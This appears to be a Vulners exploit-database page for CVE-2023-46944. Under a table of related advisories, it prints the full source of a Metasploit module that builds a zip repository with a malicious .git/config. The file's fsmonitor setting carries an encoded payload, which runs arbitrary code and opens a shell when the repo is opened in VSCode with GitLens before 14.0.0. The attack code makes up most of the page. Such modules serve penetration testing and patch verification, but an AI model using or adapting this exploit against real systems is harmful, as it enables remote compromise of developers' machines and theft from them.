| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| GitLens Git Local Configuration Execution Exploit | 23 Apr 202400:00 | – | zdt | |
| CVE-2023-46944 | 28 Nov 202322:15 | – | attackerkb | |
| CVE-2023-46944 | 20 Dec 202309:42 | – | circl | |
| GitLens Security Breach | 28 Nov 202300:00 | – | cnnvd | |
| CVE-2023-46944 | 28 Nov 202300:00 | – | cve | |
| CVE-2023-46944 | 28 Nov 202300:00 | – | cvelist | |
| EUVD-2023-51105 | 3 Oct 202520:07 | – | euvd | |
| GitLens Git Local Configuration Exec | 19 Apr 202419:51 | – | metasploit | |
| CVE-2023-46944 | 28 Nov 202322:15 | – | nvd | |
| Authorization | 28 Nov 202322:15 | – | prion |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(
update_info(
info,
'Name' => 'GitLens Git Local Configuration Exec',
'Description' => %q{
GitKraken GitLens before v.14.0.0 allows an untrusted workspace to execute git
commands. A repo may include its own .git folder including a malicious config file to
execute arbitrary code.
Tested against VSCode 1.87.2 with GitLens 13.6.0 on Ubuntu 22.04 and Windows 10
},
'License' => MSF_LICENSE,
'Author' => [
'h00die', # Metasploit module
'Paul Gerste', # Original advisory and PoC
],
'References' => [
['URL', 'https://www.sonarsource.com/blog/vscode-security-markdown-vulnerabilities-in-extensions/'],
['URL', 'https://www.sonarsource.com/blog/securing-developer-tools-git-integrations/'], # git hook
['URL', 'https://github.com/gitkraken/vscode-gitlens/commit/ee2a0c42a92d33059a39fd15fbbd5dd3d5ab6440'], # patch
['CVE', '2023-46944']
],
'DefaultOptions' => {
'EXITFUNC' => 'thread',
'DisablePayloadHandler' => false,
'FILENAME' => 'repo.zip',
'WfsDelay' => 3_600 # 1hr
},
'Arch' => ARCH_CMD,
'Targets' => [
[
'Linux/Unix (In-Memory)',
{
'Platform' => [ 'unix', 'linux' ],
'Type' => :unix_cmd
},
],
# There may be a size limit, but using fetch payloads works great
[
'PowerShell (In-Memory)',
{
'Platform' => 'win',
'Payload' => {
'BadChars' => '"&'
}
}
],
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [SCREEN_EFFECTS, ARTIFACTS_ON_DISK] # windows fetch payloads pops up a CMD window for a second, then goes away
},
'Privileged' => false,
'DisclosureDate' => '2023-11-14'
)
)
register_options([
OptString.new('README', [true, 'The contents of the readme markdown file', '# Test'])
])
end
def readme
datastore['README'].to_s
end
def git_head
'ref: refs/heads/master'
end
def git_config
%([core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
fsmonitor = "#{payload.encoded} #") # without the trailing # windows tacks on <space><int, 0><space><a long number>. so this avoids corrupting the payload
end
def exploit
# Create malicious zip archive containing our git repo
files =
[
{ data: readme, fname: 'README.md' },
{ data: git_config, fname: '.git/config' },
{ data: git_head, fname: '.git/HEAD' },
{ data: '', fname: '.git/objects/info/' },
{ data: '', fname: '.git/objects/pack/' },
{ data: '', fname: '.git/refs/heads/' },
{ data: '', fname: '.git/refs/tags/' },
]
zip = Msf::Util::EXE.to_zip(files)
file_create(zip)
print_status('Waiting for shell')
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation